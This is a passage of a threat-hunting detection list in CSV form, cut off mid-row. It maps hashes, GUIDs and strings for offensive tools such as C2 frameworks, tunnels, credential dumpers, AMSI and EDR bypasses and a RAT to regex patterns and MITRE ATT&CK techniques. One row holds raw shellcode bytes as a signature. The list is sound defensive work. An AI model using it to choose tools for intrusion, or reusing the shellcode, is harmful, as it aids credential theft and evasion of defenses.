"*4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb*",".{0,1000}4d31e1fd50918c09718d0657fb2c158a647b38ae833a231f52c717077d34d3cb.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f*",".{0,1000}4d4e0c87fefa1a01b8a55af43a2b13c41457e320292d537e4f3f9b160de0e80f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4d5350c8-7f8c-47cf-8cde-c752018af17e*",".{0,1000}4d5350c8\-7f8c\-47cf\-8cde\-c752018af17e.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc*",".{0,1000}4d5886e86e0a2c97e72a648d63ba392c9ac14c8a973b454c11ecd223e2ccc9cc.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*4D7AEF0B-5AA6-4AE5-971E-7141AA1FDAFC*",".{0,1000}4D7AEF0B\-5AA6\-4AE5\-971E\-7141AA1FDAFC.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*4D7BA537-54EC-4005-9CC2-AE134B4526F9*",".{0,1000}4D7BA537\-54EC\-4005\-9CC2\-AE134B4526F9.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10*",".{0,1000}4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45*",".{0,1000}4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4DD3206C-F14A-43A3-8EA8-88676810B8CD*",".{0,1000}4DD3206C\-F14A\-43A3\-8EA8\-88676810B8CD.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*",".{0,1000}4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445*",".{0,1000}4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4DE43724-3851-4376-BB6C-EA15CF500C44*",".{0,1000}4DE43724\-3851\-4376\-BB6C\-EA15CF500C44.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f*",".{0,1000}4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb*",".{0,1000}4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*",".{0,1000}4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749*",".{0,1000}4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03*",".{0,1000}4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55*",".{0,1000}4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8*",".{0,1000}4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e*",".{0,1000}4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c*",".{0,1000}4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d*",".{0,1000}4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4EF73752-78B0-4E0D-A33B-B6637B6C2177*",".{0,1000}4EF73752\-78B0\-4E0D\-A33B\-B6637B6C2177.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*4F169EA5-8854-4258-9D2C-D44F37D88776*",".{0,1000}4F169EA5\-8854\-4258\-9D2C\-D44F37D88776.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9*",".{0,1000}4f28ea38405ad0908c509ed774da63b57606fc2257e76d613e6968ff390867a9.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*",".{0,1000}4F2AD0E0\-8C4D\-45CB\-97DE\-CE8D4177E7BF.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408*",".{0,1000}4f83c68530797e82a76434950e56e3512487a340b5b4e24cd9f81be4eb9e9408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4FB03AD0-96FF-4730-801A-4F997795D920*",".{0,1000}4FB03AD0\-96FF\-4730\-801A\-4F997795D920.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a*",".{0,1000}4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8*",".{0,1000}4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4g3nt47/Striker*",".{0,1000}4g3nt47\/Striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*50050/SharpC2*",".{0,1000}50050\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71*",".{0,1000}5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322*",".{0,1000}503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*",".{0,1000}505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*5067F916-9971-47D6-BBCB-85FB3982584F*",".{0,1000}5067F916\-9971\-47D6\-BBCB\-85FB3982584F.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8*",".{0,1000}506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee*",".{0,1000}507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a*",".{0,1000}50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*",".{0,1000}5086CE01\-1032\-4CA3\-A302\-6CFF2A8B64DC.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*50941ad9fd99db6fca5debc3c89b3e899a9527d7*",".{0,1000}50941ad9fd99db6fca5debc3c89b3e899a9527d7.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5*",".{0,1000}50ba0bde643b62f3ddba44820ca5a45e5f7d45bf5305016150cfa4af7ab679e5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129*",".{0,1000}51005077d771b96d6157772c5c78c59a94284e8bc4396cf7a52309ee262ca129.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d*",".{0,1000}510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c*",".{0,1000}512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909*",".{0,1000}51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 